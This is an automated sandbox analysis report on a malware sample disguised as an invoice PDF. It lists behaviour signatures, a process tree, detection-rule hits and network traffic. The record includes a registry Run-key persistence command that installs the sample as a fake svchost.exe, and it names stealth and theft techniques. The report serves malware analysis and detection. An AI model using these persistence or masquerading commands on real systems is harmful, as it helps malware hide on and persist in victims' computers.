Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report Cab_Invoice_pdf.bin

Overview

General Information

Sample Name:Cab_Invoice_pdf.bin (renamed file extension from bin to exe)
Analysis ID:534002
MD5:e5dc6a7459fd6ef46afee60318470b03
SHA1:c0a036def9b2d42804c164b156aaf007d9fffa02
SHA256:ea0fd73223e8313da714a6924c1dfae72f2c976935c2b323a6b192c063b0063a
Infos:

Most interesting Screenshot:

Errors
  • Sigma runtime error: Invalid condition: all of selection* Rule: Conti Backup Database
  • Sigma runtime error: Invalid condition: all of selection* Rule: Stop Or Remove Antivirus Service
  • Sigma runtime error: Invalid condition: all of selection* Rule: Conti Volume Shadow Listing
  • Sigma runtime error: Invalid condition: all of selection* Rule: Compress Data and Lock With Password for Exfiltration With 7-ZIP
  • Sigma runtime error: Invalid condition: all of selection* Rule: Disable or Delete Windows Eventlog
  • Sigma runtime error: Invalid condition: all of selection* Rule: PowerShell SAM Copy
  • Sigma runtime error: Invalid condition: all of selection* Rule: Compress Data and Lock With Password for Exfiltration With WINZIP

Detection

Score:72
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Antivirus / Scanner detection for submitted sample
Sigma detected: System File Execution Location Anomaly
Initial sample is a PE file and has a suspicious name
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Drops PE files with benign system names
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
PE file contains sections with non-standard names
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Contains functionality to get notified if a device is plugged in / out
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Direct Autorun Keys Modification
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Contains functionality to simulate keystroke presses
Contains functionality which may be used to detect a debugger (GetProcessHeap)
AV process strings found (often used to terminate AV products)
PE file does not import any functions
Sample file is different than original file name gathered from version info
Extensive use of GetProcAddress (often used to hide API calls)
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Sigma detected: Reg Add RUN Key
Detected TCP or UDP traffic on non-standard ports
Binary contains a suspicious time stamp
Uses SMTP (mail sending)
Uses reg.exe to modify the Windows registry
Contains functionality to retrieve information about pressed keystrokes
Queries disk information (often used to detect virtual machines)
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to simulate mouse events

Classification

Process Tree

  • System is w10x64
  • Cab_Invoice_pdf.exe (PID: 2412 cmdline: "C:\Users\user\Desktop\Cab_Invoice_pdf.exe" MD5: E5DC6A7459FD6EF46AFEE60318470B03)
    • Cab_Invoice_pdf.exe (PID: 6476 cmdline: "C:\Users\user\Desktop\Cab_Invoice_pdf.exe" MD5: E5DC6A7459FD6EF46AFEE60318470B03)
      • cmd.exe (PID: 6780 cmdline: C:\Windows\system32\cmd.exe /c "reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v svchost /t REG_SZ /d "C:\Users\user\AppData\Roaming\svchost.exe"" MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 6804 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • reg.exe (PID: 6860 cmdline: reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v svchost /t REG_SZ /d "C:\Users\user\AppData\Roaming\svchost.exe" MD5: CEE2A7E57DF2A159A065A34913A055C2)
  • svchost.exe (PID: 6436 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6724 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 3176 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6308 cmdline: "C:\Users\user\AppData\Roaming\svchost.exe" MD5: E5DC6A7459FD6EF46AFEE60318470B03)
    • svchost.exe (PID: 3108 cmdline: "C:\Users\user\AppData\Roaming\svchost.exe" MD5: E5DC6A7459FD6EF46AFEE60318470B03)
  • svchost.exe (PID: 3672 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6156 cmdline: "C:\Users\user\AppData\Roaming\svchost.exe" MD5: E5DC6A7459FD6EF46AFEE60318470B03)
    • svchost.exe (PID: 6128 cmdline: "C:\Users\user\AppData\Roaming\svchost.exe" MD5: E5DC6A7459FD6EF46AFEE60318470B03)
  • svchost.exe (PID: 5028 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

System Summary:

barindex
Sigma detected: System File Execution Location AnomalyShow sources
Source: Process startedAuthor: Florian Roth, Patrick Bareiss, Anton Kutepov, oscd.community: Data: Command: "C:\Users\user\AppData\Roaming\svchost.exe" , CommandLine: "C:\Users\user\AppData\Roaming\svchost.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\svchost.exe, NewProcessName: C:\Users\user\AppData\Roaming\svchost.exe, OriginalFileName: C:\Users\user\AppData\Roaming\svchost.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\svchost.exe" , ParentImage: C:\Users\user\AppData\Roaming\svchost.exe, ParentProcessId: 6308, ProcessCommandLine: "C:\Users\user\AppData\Roaming\svchost.exe" , ProcessId: 3108
Sigma detected: Direct Autorun Keys ModificationShow sources
Source: Process startedAuthor: Victor Sergeev, Daniil Yugoslavskiy, oscd.community: Data: Command: reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v svchost /t REG_SZ /d "C:\Users\user\AppData\Roaming\svchost.exe", CommandLine: reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v svchost /t REG_SZ /d "C:\Users\user\AppData\Roaming\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\reg.exe, NewProcessName: C:\Windows\SysWOW64\reg.exe, OriginalFileName: C:\Windows\SysWOW64\reg.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v svchost /t REG_SZ /d "C:\Users\user\AppData\Roaming\svchost.exe"", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6780, ProcessCommandLine: reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v svchost /t REG_SZ /d "C:\Users\user\AppData\Roaming\svchost.exe", ProcessId: 6860
Sigma detected: Reg Add RUN KeyShow sources
Source: Process startedAuthor: Florian Roth: Data: Command: C:\Windows\system32\cmd.exe /c "reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v svchost /t REG_SZ /d "C:\Users\user\AppData\Roaming\svchost.exe"", CommandLine: C:\Windows\system32\cmd.exe /c "reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v svchost /t REG_SZ /d "C:\Users\user\AppData\Roaming\svchost.exe"", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\Cab_Invoice_pdf.exe" , ParentImage: C:\Users\user\Desktop\Cab_Invoice_pdf.exe, ParentProcessId: 6476, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v svchost /t REG_SZ /d "C:\Users\user\AppData\Roaming\svchost.exe"", ProcessId: 6780
Sigma detected: Windows Processes Suspicious Parent DirectoryShow sources
Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\AppData\Roaming\svchost.exe" , CommandLine: "C:\Users\user\AppData\Roaming\svchost.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\svchost.exe, NewProcessName: C:\Users\user\AppData\Roaming\svchost.exe, OriginalFileName: C:\Users\user\AppData\Roaming\svchost.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\svchost.exe" , ParentImage: C:\Users\user\AppData\Roaming\svchost.exe, ParentProcessId: 6308, ProcessCommandLine: "C:\Users\user\AppData\Roaming\svchost.exe" , ProcessId: 3108

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Multi AV Scanner detection for submitted fileShow sources
Source: Cab_Invoice_pdf.exeVirustotal: Detection: 62%Perma Link
Source: Cab_Invoice_pdf.exeMetadefender: Detection: 33%Perma Link
Source: Cab_Invoice_pdf.exeReversingLabs: Detection: 58%
Antivirus / Scanner detection for submitted sampleShow sources
Source: Cab_Invoice_pdf.exeAvira: detected
Source: 1.3.Cab_Invoice_pdf.exe.10695b0.14.unpackAvira: Label: TR/Patched.Ren.Gen
Source: Cab_Invoice_pdf.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
Source: Cab_Invoice_pdf.exeStatic PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: svchost.exe, 0000000B.00000003.428528477.0000000000E1B000.00000004.00000001.sdmp
Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: svchost.exe, 0000000B.00000003.433779342.0000000000E1B000.00000004.00000001.sdmp
Source: Binary string: D:\a\1\b\bin\win32\_multiprocessing.pdb source: svchost.exe, 0000000B.00000003.389747907.0000000000E1B000.00000004.00000001.sdmp
Source: Binary string: ucrtbase.pdb source: Cab_Invoice_pdf.exe, 00000003.00000002.566821598.000000006E801000.00000020.00020000.sdmp, svchost.exe, 0000000B.00000003.461345666.0000000002B00000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.489294757.0000000003600000.00000004.00000001.sdmp
Source: Binary string: api-ms-win-core-file-l1-2-0.pdb source: svchost.exe, 0000000B.00000003.394749545.0000000000E1B000.00000004.00000001.sdmp
Source: Binary string: D:\a\1\b\bin\win32\_decimal.pdb%% source: svchost.exe, 0000000B.00000003.388243683.0000000000E6C000.00000004.00000001.sdmp
Source: Binary string: api-ms-win-core-memory-l1-1-0.pdb source: svchost.exe, 0000000B.00000003.398010798.0000000000E1B000.00000004.00000001.sdmp
Source: Binary string: api-ms-win-core-debug-l1-1-0.pdb source: svchost.exe, 0000000B.00000003.393554815.0000000000E1B000.00000004.00000001.sdmp
Source: Binary string: D:\a\1\b\bin\win32\_ssl.pdb source: Cab_Invoice_pdf.exe, 00000003.00000002.567499040.000000006EC0E000.00000002.00020000.sdmp, svchost.exe, 0000000B.00000003.391481591.0000000000E6C000.00000004.00000001.sdmp
Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: svchost.exe, 0000000B.00000003.412809412.0000000000E1B000.00000004.00000001.sdmp
Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: svchost.exe, 0000000B.00000003.425322367.0000000000E1B000.00000004.00000001.sdmp
Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: svchost.exe, 0000000B.00000003.435730972.0000000000E1B000.00000004.00000001.sdmp
Source: Binary string: d:\agent\_work\9\s\\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: Cab_Invoice_pdf.exe, 00000003.00000002.569291136.0000000072F21000.00000020.00020000.sdmp, svchost.exe, 0000000B.00000003.386396710.0000000000E28000.00000004.00000001.sdmp, svchost.exe, 00000013.00000002.485296621.0000000070131000.00000020.00020000.sdmp
Source: Binary string: C:\src\pywin32\build\temp.win32-3.8\Release\pywintypes.pdb source: Cab_Invoice_pdf.exe, 00000003.00000002.568991542.000000006F30E000.00000002.00020000.sdmp, svchost.exe, 0000000B.00000003.459130908.0000000000E28000.00000004.00000001.sdmp
Source: Binary string: api-ms-win-core-heap-l1-1-0.pdb source: svchost.exe, 0000000B.00000003.396174179.0000000000E1B000.00000004.00000001.sdmp
Source: Binary string: api-ms-win-core-util-l1-1-0.pdb source: svchost.exe, 0000000B.00000003.418168798.0000000000E1B000.00000004.00000001.sdmp
Source: Binary string: api-ms-win-core-synch-l1-1-0.pdb source: svchost.exe, 0000000B.00000003.410176305.0000000000E1B000.00000004.00000001.sdmp
Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: svchost.exe, 0000000B.00000003.423854182.0000000000E1B000.00000004.00000001.sdmp
Source: Binary string: D:\a\1\b\bin\win32\pyexpat.pdb source: svchost.exe, 0000000B.00000003.455016271.0000000000E6C000.00000004.00000001.sdmp
Source: Binary string: api-ms-win-core-errorhandling-l1-1-0.pdb source: svchost.exe, 0000000B.00000003.393935792.0000000000E1B000.00000004.00000001.sdmp
Source: Binary string: C:\src\pywin32\build\temp.win32-3.8\Release\win32api.pdb source: Cab_Invoice_pdf.exe, 00000003.00000002.567031750.000000006EADF000.00000002.00020000.sdmp, svchost.exe, 0000000B.00000003.464053217.0000000000E28000.00000004.00000001.sdmp
Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: svchost.exe, 0000000B.00000003.401443735.0000000000E1B000.00000004.00000001.sdmp
Source: Binary string: api-ms-win-core-console-l1-1-0.pdb source: svchost.exe, 0000000B.00000003.392740878.0000000000E1B000.00000004.00000001.sdmp
Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC source: Cab_Invoice_pdf.exe, 00000003.00000002.568469462.000000006EDAC000.00000002.00020000.sdmp, svchost.exe, 0000000B.00000003.449130672.0000000002B7A000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.482692912.000000000377A000.00000004.00000001.sdmp
Source: Binary string: C:\src\pywin32\build\temp.win32-3.8\Release\win32api.pdb source: Cab_Invoice_pdf.exe, 00000003.00000002.567031750.000000006EADF000.00000002.00020000.sdmp, svchost.exe, 0000000B.00000003.464053217.0000000000E28000.00000004.00000001.sdmp
Source: Binary string: D:\a\1\b\bin\win32\_bz2.pdb source: Cab_Invoice_pdf.exe, 00000003.00000002.567266133.000000006EB5E000.00000002.00020000.sdmp, svchost.exe, 0000000B.00000003.387226711.0000000000E28000.00000004.00000001.sdmp
Source: Binary string: api-ms-win-core-file-l1-1-0.pdb source: svchost.exe, 0000000B.00000003.394362827.0000000000E1B000.00000004.00000001.sdmp
Source: Binary string: D:\a\1\b\bin\win32\_ctypes.pdb source: Cab_Invoice_pdf.exe, 00000003.00000002.569245523.00000000703D3000.00000002.00020000.sdmp, svchost.exe, 0000000B.00000003.387736451.0000000000E6C000.00000004.00000001.sdmp
Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: svchost.exe, 0000000B.00000003.421932016.0000000000E1B000.00000004.00000001.sdmp
Source: Binary string: D:\a\1\b\bin\win32\_asyncio.pdb source: svchost.exe, 0000000B.00000003.386815953.0000000000E28000.00000004.00000001.sdmp
Source: Binary string: C:\src\pywin32\build\temp.win32-3.8\Release\win32gui.pdb source: Cab_Invoice_pdf.exe, 00000003.00000002.567116932.000000006EB0B000.00000002.00020000.sdmp, svchost.exe, 0000000B.00000003.467080000.0000000000E6C000.00000004.00000001.sdmp, svchost.exe, 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp
Source: Binary string: ta.pdb source: Cab_Invoice_pdf.exe
Source: Binary string: D:\a\1\b\bin\win32\unicodedata.pdb source: Cab_Invoice_pdf.exe, 00000003.00000002.566048535.000000006E3F7000.00000002.00020000.sdmp, svchost.exe, 0000000B.00000003.462814052.0000000002C05000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.490361561.0000000003705000.00000004.00000001.sdmp
Source: Binary string: C:\A\6\b\libssl-1_1.pdb source: Cab_Invoice_pdf.exe, 00000003.00000002.567385268.000000006EBD0000.00000002.00020000.sdmp, svchost.exe, 0000000B.00000003.453594434.000000000295F000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.484471608.000000000355F000.00000004.00000001.sdmp
Source: Binary string: ucrtbase.pdbUGP source: Cab_Invoice_pdf.exe, 00000003.00000002.566821598.000000006E801000.00000020.00020000.sdmp, svchost.exe, 0000000B.00000003.461345666.0000000002B00000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.489294757.0000000003600000.00000004.00000001.sdmp
Source: Binary string: api-ms-win-core-profile-l1-1-0.pdb source: svchost.exe, 0000000B.00000003.405860680.0000000000E1B000.00000004.00000001.sdmp
Source: Binary string: D:\a\1\b\bin\win32\_socket.pdb source: Cab_Invoice_pdf.exe, 00000003.00000002.569068056.000000006F339000.00000002.00020000.sdmp, svchost.exe, 0000000B.00000003.391001556.0000000000E28000.00000004.00000001.sdmp
Source: Binary string: D:\a\1\b\bin\win32\python38.pdb source: Cab_Invoice_pdf.exe, 00000003.00000002.566602937.000000006E713000.00000002.00020000.sdmp, svchost.exe, 0000000B.00000003.457664564.000000000301A000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.487589642.0000000003B1A000.00000004.00000001.sdmp
Source: Binary string: api-ms-win-crt-time-l1-1-0.pdb source: svchost.exe, 0000000B.00000003.439490901.0000000000E1B000.00000004.00000001.sdmp
Source: Binary string: api-ms-win-core-handle-l1-1-0.pdb source: svchost.exe, 0000000B.00000003.395552475.0000000000E1B000.00000004.00000001.sdmp
Source: Binary string: D:\a\1\b\bin\win32\_lzma.pdbOO source: Cab_Invoice_pdf.exe, 00000003.00000002.567205585.000000006EB3B000.00000002.00020000.sdmp, svchost.exe, 0000000B.00000003.389272849.0000000000E6C000.00000004.00000001.sdmp, svchost.exe, 00000013.00000002.481773795.000000006DAEB000.00000002.00020000.sdmp
Source: Binary string: api-ms-win-core-synch-l1-2-0.pdb source: svchost.exe, 0000000B.00000003.411685579.0000000000E1B000.00000004.00000001.sdmp
Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: svchost.exe, 0000000B.00000003.399919805.0000000000E1B000.00000004.00000001.sdmp
Source: Binary string: D:\a\1\b\bin\win32\_queue.pdb source: Cab_Invoice_pdf.exe, 00000003.00000002.568924352.000000006F2F3000.00000002.00020000.sdmp, svchost.exe, 0000000B.00000003.390573271.0000000000E1B000.00000004.00000001.sdmp
Source: Binary string: D:\a\1\b\bin\win32\_lzma.pdb source: Cab_Invoice_pdf.exe, 00000003.00000002.567205585.000000006EB3B000.00000002.00020000.sdmp, svchost.exe, 0000000B.00000003.389272849.0000000000E6C000.00000004.00000001.sdmp, svchost.exe, 00000013.00000002.481773795.000000006DAEB000.00000002.00020000.sdmp
Source: Binary string: api-ms-win-core-datetime-l1-1-0.pdb source: svchost.exe, 0000000B.00000003.393149261.0000000000E1B000.00000004.00000001.sdmp
Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PICOpenSSL 1.1.1i 8 Dec 2020built on: Tue Jan 5 20:17:31 2021 UTCplatform: VC-WIN32OPENSSLDIR: "C:\Program Files (x86)\Common Files\SSL"ENGINESDIR: "C:\Program Files (x86)\OpenSSL\lib\engines-1_1"not available source: Cab_Invoice_pdf.exe, 00000003.00000002.568469462.000000006EDAC000.00000002.00020000.sdmp, svchost.exe, 0000000B.00000003.449130672.0000000002B7A000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.482692912.000000000377A000.00000004.00000001.sdmp
Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: svchost.exe, 0000000B.00000003.420047349.0000000000E1B000.00000004.00000001.sdmp
Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: svchost.exe, 0000000B.00000003.397576219.0000000000E1B000.00000004.00000001.sdmp
Source: Binary string: api-ms-win-crt-math-l1-1-0.pdb source: svchost.exe, 0000000B.00000003.430416405.0000000000E1B000.00000004.00000001.sdmp
Source: Binary string: D:\a\1\b\bin\win32\_overlapped.pdb source: svchost.exe, 0000000B.00000003.390148766.0000000000E28000.00000004.00000001.sdmp
Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: svchost.exe, 0000000B.00000003.403125486.0000000000E1B000.00000004.00000001.sdmp
Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: svchost.exe, 0000000B.00000003.399119703.0000000000E1B000.00000004.00000001.sdmp
Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: svchost.exe, 0000000B.00000003.441941698.0000000000E1B000.00000004.00000001.sdmp
Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: svchost.exe, 0000000B.00000003.407177237.0000000000E1B000.00000004.00000001.sdmp
Source: Binary string: C:\A\6\b\libcrypto-1_1.pdb source: Cab_Invoice_pdf.exe, 00000003.00000002.568546215.000000006EDF8000.00000002.00020000.sdmp
Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: svchost.exe, 0000000B.00000003.414456474.0000000000E1B000.00000004.00000001.sdmp
Source: Binary string: api-ms-win-core-string-l1-1-0.pdb source: svchost.exe, 0000000B.00000003.408682511.0000000000E1B000.00000004.00000001.sdmp
Source: Binary string: api-ms-win-core-file-l2-1-0.pdb source: svchost.exe, 0000000B.00000003.395157867.0000000000E1B000.00000004.00000001.sdmp
Source: Binary string: C:\src\pywin32\build\temp.win32-3.8\Release\pywintypes.pdb+ source: Cab_Invoice_pdf.exe, 00000003.00000002.568991542.000000006F30E000.00000002.00020000.sdmp, svchost.exe, 0000000B.00000003.459130908.0000000000E28000.00000004.00000001.sdmp
Source: Binary string: api-ms-win-crt-process-l1-1-0.pdb source: svchost.exe, 0000000B.00000003.432280344.0000000000E1B000.00000004.00000001.sdmp
Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: svchost.exe, 0000000B.00000003.397132347.0000000000E1B000.00000004.00000001.sdmp
Source: Binary string: D:\a\1\b\bin\win32\select.pdb source: Cab_Invoice_pdf.exe, 00000003.00000002.569138282.0000000070283000.00000002.00020000.sdmp, svchost.exe, 0000000B.00000003.460241183.0000000000E1B000.00000004.00000001.sdmp
Source: Binary string: C:\A\6\b\libssl-1_1.pdb@@ source: Cab_Invoice_pdf.exe, 00000003.00000002.567385268.000000006EBD0000.00000002.00020000.sdmp, svchost.exe, 0000000B.00000003.453594434.000000000295F000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.484471608.000000000355F000.00000004.00000001.sdmp
Source: Binary string: D:\a\1\b\bin\win32\_hashlib.pdb source: Cab_Invoice_pdf.exe, 00000003.00000002.568820397.000000006F2E5000.00000002.00020000.sdmp, svchost.exe, 0000000B.00000003.388795347.0000000000E28000.00000004.00000001.sdmp
Source: Binary string: D:\a\1\b\bin\win32\_decimal.pdb source: svchost.exe, 0000000B.00000003.388243683.0000000000E6C000.00000004.00000001.sdmp
Source: Binary string: C:\src\pywin32\build\temp.win32-3.8\Release\win32event.pdb source: Cab_Invoice_pdf.exe, 00000003.00000002.568721354.000000006F2D4000.00000002.00020000.sdmp, svchost.exe, 0000000B.00000003.465540156.0000000000E1B000.00000004.00000001.sdmp
Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: svchost.exe, 0000000B.00000003.396644442.0000000000E1B000.00000004.00000001.sdmp
Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: svchost.exe, 0000000B.00000003.426625427.0000000000E1B000.00000004.00000001.sdmp
Source: Binary string: api-ms-win-crt-string-l1-1-0.pdb source: svchost.exe, 0000000B.00000003.437644496.0000000000E1B000.00000004.00000001.sdmp
Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 19_2_6DAAD570 PyArg_ParseTuple,?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z,PyObject_AsReadBuffer,PyExc_ValueError,PyExc_ValueError,PyErr_Format,PyEval_SaveThread,RegisterDeviceNotificationW,PyEval_RestoreThread,?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z,19_2_6DAAD570
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeCode function: 1_2_0132715E FindFirstFileExW,1_2_0132715E
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeCode function: 1_2_0131E260 FindFirstFileExW,GetLastError,FindNextFileW,GetLastError,1_2_0131E260
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeCode function: 3_2_0132715E FindFirstFileExW,3_2_0132715E
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeCode function: 3_2_0131E260 FindFirstFileExW,GetLastError,FindNextFileW,GetLastError,3_2_0131E260
Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 11_2_00BCE260 FindFirstFileExW,GetLastError,FindNextFileW,GetLastError,11_2_00BCE260
Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 11_2_00BD715E FindFirstFileExW,11_2_00BD715E
Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 19_2_00BD715E FindFirstFileExW,19_2_00BD715E
Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 19_2_00BCE260 FindFirstFileExW,GetLastError,FindNextFileW,GetLastError,19_2_00BCE260
Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 19_2_6DA72F40 PyArg_ParseTuple,?PyWinObject_AsWCHAR@@YAHPAU_object@@PAPA_WHPAK@Z,PyList_New,_Py_Dealloc,FindFirstFileW,GetLastError,?PyObject_FromWIN32_FIND_DATAW@@YAPAU_object@@PAU_WIN32_FIND_DATAW@@@Z,PyList_Append,_Py_Dealloc,_Py_Dealloc,_Py_Dealloc,FindNextFileW,GetLastError,?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z,?PyWinObject_FreeWCHAR@@YAXPA_W@Z,FindClose,_Py_Dealloc,19_2_6DA72F40
Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 19_2_6DA747B0 PyArg_ParseTuple,GetLogicalDriveStringsW,?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z,GetLogicalDriveStringsW,?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z,?PyWinObject_FromOLECHAR@@YAPAU_object@@PB_WH@Z,19_2_6DA747B0
Source: global trafficTCP traffic: 192.168.2.3:49751 -> 142.250.145.108:587
Source: global trafficTCP traffic: 192.168.2.3:49775 -> 142.250.145.109:587
Source: global trafficTCP traffic: 192.168.2.3:49751 -> 142.250.145.108:587
Source: global trafficTCP traffic: 192.168.2.3:49775 -> 142.250.145.109:587
Source: svchost.exe, 0000000C.00000003.394282413.0000020D18391000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","A equals www.facebook.com (Facebook)
Source: svchost.exe, 0000000C.00000003.394282413.0000020D18391000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","A equals www.twitter.com (Twitter)
